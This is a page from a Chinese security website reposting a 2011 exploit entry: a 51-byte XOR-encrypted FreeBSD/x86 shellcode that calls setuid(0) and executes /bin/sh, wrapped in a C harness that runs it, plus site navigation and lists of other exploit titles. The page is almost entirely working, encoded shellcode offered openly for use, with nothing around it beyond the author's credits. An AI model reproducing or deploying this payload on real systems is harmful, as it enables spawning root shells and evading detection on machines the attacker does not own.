首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
51 bytes FreeBSD/x86 encrypted setuid(0) execve /bin/sh
来源:devilzc0de.org 作者:mywisdom 发布时间:2011-05-30  
/**
Title : 51 bytes FreeBSD/x86 encrypted setuid(0) execve /bin/sh
Date : Sun May 29 08:07:11 UTC 2011
Author; mywisdom (antonsoft_2004@yahoo.com)
Web : devilzc0de.org
Gopher: gopher://sdf.org/1/users/wisdomc0
Blog : http://myw1sd0m.blogspot.com/
Tested on: FreeBSD 8.2-RELEASE i386
special thanks to gunslinger,flyf666,petimati,peneter,wenkhairu, danzel, net_spy, and all my friends
**/
#include <stdio.h>
#include <string.h>
int main()
{
char sc[]="\xeb\x0d\x5e\x31\xc9\xb1\x1f\x80\x36\x42\x46\xe2\xfa\xeb\x05"
"\xe8\xee\xff\xff\xff\x73\x82\x12\x12\xf2\x55\x8f\xc2\x73\x82"
"\x12\x2a\x6d\x6d\x31\x2a\x2a\x6d\x20\x2b\x2c\xcb\xa1\x12\x16"
"\x11\x12\xf2\x79\x8f\xc2";
fprintf(stdout,"Length: %d\n",strlen(sc));
(*(void(*)()) sc)();
return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeBSD/x86 - Execve ('/bin/sh
·LostDoor v6 Remote Denial Of S
·Poison Ivy 2.3.2 (Latest versi
·Bitweaver 2.x (FCKeditor) File
·HP Data Protector Client EXEC_
·WysGui <= 2.3 (FCKeditor) File
·HP Data Protector Client EXEC_
·Trojan Nova Lite v2.6 Access V
·Magix Musik Maker 16 .mmm Stac
·LilHTTP Source Code Disclosure
·Magneto ICMP ActiveX v4.0.0.20
·DNS Reverse Download and Exec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved